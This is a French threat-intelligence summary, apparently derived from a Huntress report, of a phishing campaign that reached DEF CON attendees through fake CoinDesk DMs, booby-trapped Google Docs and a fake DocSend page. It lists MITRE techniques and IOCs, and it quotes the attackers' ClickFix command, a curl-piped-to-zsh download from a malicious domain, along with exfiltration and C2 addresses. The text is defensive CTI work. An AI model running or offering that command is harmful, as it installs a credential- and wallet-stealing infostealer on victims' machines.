đŻ Contexte
Source : Huntress, publié le 20 août 2026. Dans les jours suivant Black Hat et DEF CON, un chercheur Huntress a été ciblé par un acteur malveillant via des messages directs sur X (Twitter), exploitant le contexte post-conférence comme prétexte social.
đ”ïž Vecteur initial
Le compte X @HartmansDoeke s’est fait passer pour le VP Marketing de CoinDesk, contactant des participants Ă DEF CON avec un prĂ©texte de planification de confĂ©rence. L’acteur a partagĂ© un Google Doc malveillant accompagnĂ© d’une « clĂ© d’accĂšs » par DM.
đ MĂ©canisme du Google Doc
Le document exploite un Google Apps Script personnalisé (DecryptPanel.html) qui :
- Valide un ensemble restreint de clés codées en dur
- Collecte des informations sur la victime et l’hĂŽte
- Rapporte l’activitĂ© via Telegram
- PrĂ©sente des chemins d’infection distincts selon macOS ou Windows
- Contient des commentaires en russe dans le code
La fausse « décryption » échoue intentionnellement, poussant la victime vers des instructions ClickFix ou un téléchargement manuel.
đ Chemin macOS
- ClickFix :
curl -fsSL https://apple-googleapi.com/i | zsh(redirige en boucle vers 127.0.0.1 au moment de l’analyse) - TĂ©lĂ©chargement manuel :
GAPIUpdate.dmgdepuis GitHub, contenant un bundle ad-hoc signé contournant Gatekeeper - Payload : AMOS infostealer ciblant mots de passe navigateurs, cookies, wallets crypto, keychain, Telegram, Notes.app
- Exfiltration vers
http://86.54.25.213/log - Persistance via LaunchDaemon
/Library/LaunchDaemons/com.xdivcmp.plistavec backdoor de polling et support SOCKS5
đȘ Chemin Windows (leurre 1)
- ClickOnce :
GapiUpdate.applicationsigné avec un certificat volé (société norvégienne BARNEHAGEN GUNHILDS MINNE AS) - PowerShell : script chiffré téléchargeant un loader depuis
https://1foqo.lat/core4 - Payloads téléchargés :
DockerDesktopSvc.exe,SteamClientHelperHost.exe,TeraCopyMonMon.exe
đŠ Leurre secondaire : faux DocSend
Un second document imitant un partage Dropbox DocSend redirige vers docsend.online/download/drivers :
- macOS â AMOS infostealer (DocSendInstaller.zip via apple.eu03hub.com)
- Windows â
DocsendInstaller.exe(Electron/NSIS, certificat Discord volé)
Chaßne Windows en 3 étapes :
- Stage 1 : Fingerprinting hĂŽte (HW ID, OS, CPU, GPU, BIOS, layouts clavier) â envoi Ă
docsend.web12api.com/api/launcher/start - Stage 2 : Payload JavaScript exécuté en mémoire
- Stage 3 : 3 payloads depuis
eu03hub.com:- NetSupport Manager RAT (C2 : msedgewebview1.pro / msedgewebview2.pro:443, IP 87.120.104.88)
- Proxy TLS interceptant : installe une CA racine frauduleuse (O=Google Trust Services, CN=WR3), forge un certificat pour www.virustotal.com, redirige le trafic localement
- Implant Ledger : cible les wallets Ledger Live, polling vers
eu07connect.com/api/commands/<bot_id>, persistance via clé Run registry
đ Infrastructure
L’infrastructure suit un schĂ©ma numĂ©rotĂ© (eu03hub, eu07connect, web12api, eu02hub) suggĂ©rant une opĂ©ration plus large. Des caractĂšres cyrilliques ont Ă©tĂ© observĂ©s dans le trafic C2.
đ Type d’article
Analyse technique dĂ©taillĂ©e d’une campagne active, publiĂ©e par Huntress Ă des fins de documentation CTI et de partage d’IOCs.
đ§ TTPs et IOCs dĂ©tectĂ©s
TTP
- T1566.002 â Phishing: Spearphishing Link (Initial Access)
- T1204.002 â User Execution: Malicious File (Execution)
- T1204.001 â User Execution: Malicious Link (Execution)
- T1059.001 â Command and Scripting Interpreter: PowerShell (Execution)
- T1059.002 â Command and Scripting Interpreter: AppleScript (Execution)
- T1059.007 â Command and Scripting Interpreter: JavaScript (Execution)
- T1547.001 â Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (Persistence)
- T1543.004 â Create or Modify System Process: Launch Daemon (Persistence)
- T1553.002 â Subvert Trust Controls: Code Signing (Defense Evasion)
- T1553.004 â Subvert Trust Controls: Install Root Certificate (Defense Evasion)
- T1036.005 â Masquerading: Match Legitimate Name or Location (Defense Evasion)
- T1055 â Process Injection (Defense Evasion)
- T1090.001 â Proxy: Internal Proxy (Command and Control)
- T1090.004 â Proxy: Domain Fronting (Command and Control)
- T1557 â Adversary-in-the-Middle (Collection)
- T1539 â Steal Web Session Cookie (Credential Access)
- T1555 â Credentials from Password Stores (Credential Access)
- T1041 â Exfiltration Over C2 Channel (Exfiltration)
- T1571 â Non-Standard Port (Command and Control)
- T1105 â Ingress Tool Transfer (Command and Control)
- T1056.001 â Input Capture: Keylogging (Collection)
- T1082 â System Information Discovery (Discovery)
- T1614 â System Location Discovery (Discovery)
IOC
- IPv4 :
86.54.25.213â AbuseIPDB · VT · ThreatFox - IPv4 :
192.253.248.181â AbuseIPDB · VT · ThreatFox - IPv4 :
87.120.104.88â AbuseIPDB · VT · ThreatFox - Domaines :
apple-googleapi.comâ VT · URLhaus · ThreatFox - Domaines :
gapidriver.comâ VT · URLhaus · ThreatFox - Domaines :
1foqo.latâ VT · URLhaus · ThreatFox - Domaines :
2fksf.latâ VT · URLhaus · ThreatFox - Domaines :
3pqow.latâ VT · URLhaus · ThreatFox - Domaines :
docsend.onlineâ VT · URLhaus · ThreatFox - Domaines :
docsend.web12api.comâ VT · URLhaus · ThreatFox - Domaines :
signow.web12api.comâ VT · URLhaus · ThreatFox - Domaines :
eu03hub.comâ VT · URLhaus · ThreatFox - Domaines :
apple.eu03hub.comâ VT · URLhaus · ThreatFox - Domaines :
microsoft.eu02hub.comâ VT · URLhaus · ThreatFox - Domaines :
msedgewebview1.proâ VT · URLhaus · ThreatFox - Domaines :
msedgewebview2.proâ VT · URLhaus · ThreatFox - Domaines :
eu07connect.comâ VT · URLhaus · ThreatFox - Domaines :
web12api.comâ VT · URLhaus · ThreatFox - URLs :
https://apple-googleapi.com/iâ URLhaus - URLs :
https://gapidriver.com/installer/GapiUpdate.applicationâ URLhaus - URLs :
https://1foqo.lat/core4â URLhaus - URLs :
https://2fksf.lat/res10.phpâ URLhaus - URLs :
https://2fksf.lat/res11.phpâ URLhaus - URLs :
https://3pqow.lat/res12.phpâ URLhaus - URLs :
https://docsend.online/download/driversâ URLhaus - URLs :
https://docsend.web12api.com/api/launcher/startâ URLhaus - URLs :
https://signow.web12api.com/api/launcher/startâ URLhaus - URLs :
https://eu03hub.com/get_file?file=2Ec6QYynajHwâ URLhaus - URLs :
https://eu03hub.com/get_file?file=T3YxekrHsgfaDdXYâ URLhaus - URLs :
https://eu03hub.com/get_file?file=qV06ev1a1pOYâ URLhaus - URLs :
https://eu07connect.com/api/commands/â URLhaus - URLs :
http://86.54.25.213/logâ URLhaus - URLs :
http://192.253.248.181/api/v1/getscpt/â URLhaus - SHA256 :
15afe14b5db2896d35a0c4f3139db85158da120fa90613c975c88f10bbbcc420â VT · MalwareBazaar - MD5 :
8ca79bd95f73a7f984b95e487dc1552bâ VT · MalwareBazaar - MD5 :
281f1d9e0638517ac90d61e47fd8be60â VT · MalwareBazaar - MD5 :
6dd77235aaa99153ad790b5e59b49372â VT · MalwareBazaar - MD5 :
f4769ba9e8065727ef26cca72e894f83â VT · MalwareBazaar - MD5 :
cd08e22dbfe032d15b54217f4f4ed350â VT · MalwareBazaar - Fichiers :
GAPIUpdate.dmg - Fichiers :
GapiUpdate.application - Fichiers :
DocsendInstaller.exe - Fichiers :
DocSendInstaller.zip - Fichiers :
Manager.msi - Fichiers :
Localcertificate.exe - Fichiers :
Asusdriverld.exe - Fichiers :
DockerDesktopSvc.exe - Fichiers :
SteamClientHelperHost.exe - Fichiers :
TeraCopyMonMon.exe - Fichiers :
com.xdivcmp.plist - Fichiers :
nskbfltr.sys - Fichiers :
sys.ps1 - Chemins :
/tmp/lksopo - Chemins :
/Library/LaunchDaemons/com.xdivcmp.plist - Chemins :
C:\Windows\system32\drivers\nskbfltr.sys - Chemins :
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MsBuild.exe - Chemins :
%LOCALAPPDATA%\Microsoft\Windows\UpdateCache - Chemins :
%APPDATA%\Ledger Live\app.crc32 - Chemins :
~/.phost - Chemins :
~/.bhost - Chemins :
~/.username - Chemins :
~/.botid - Chemins :
~/.pwd - Chemins :
~/.uninstalled - Chemins :
~/.lastaction
â ïž Ă propos de ces IOC â ils sont extraits automatiquement de l’article original le 20 aoĂ»t 2026 et n’ont pas fait l’objet d’une vĂ©rification externe. Un indicateur peut avoir Ă©tĂ© rĂ©attribuĂ© depuis : une IP de C2 peut redevenir un service lĂ©gitime, un domaine sinkholĂ© peut changer de propriĂ©taire. Aucune garantie d’exactitude ni d’actualitĂ© â contrĂŽlez leur validitĂ© avant tout usage opĂ©rationnel, en particulier avant de les injecter dans une blocklist ou un SIEM.
Malware / Outils
- AMOS (stealer)
- NetSupport RAT (rat)
- Sleestak (loader)
- GAPIUpdate (loader)
- DocsendInstaller (loader)
đą Indice de vĂ©rification factuelle : 90/100 (haute)
- â huntress.com â source reconnue (liste interne) (20pts)
- â 27796 chars â texte complet (fulltext extrait) (15pts)
- â 65 IOCs dont des hashes (15pts)
- â 5/10 IOCs confirmĂ©s (AbuseIPDB, MalwareBazaar, ThreatFox, URLhaus, VirusTotal) (15pts)
- â 23 TTPs MITRE identifiĂ©es (15pts)
- â date extraite du HTML source (10pts)
- ⏠aucun acteur de menace nommé (0pts)
- ⏠pas de CVE à vérifier (0pts)
IOCs confirmés externellement :
86.54.25.213(ip) â VT (8/91 dĂ©tections)192.253.248.181(ip) â VT (16/91 dĂ©tections) + ThreatFox (Odyssey Stealer)87.120.104.88(ip) â VT (14/91 dĂ©tections) + ThreatFox (NetSupportManager RAT)apple-googleapi.com(domain) â VT (3/91 dĂ©tections)1foqo.lat(domain) â VT (5/91 dĂ©tections)
đ Source originale : https://www.huntress.com/blog/defcon-phishing-google-doc-malware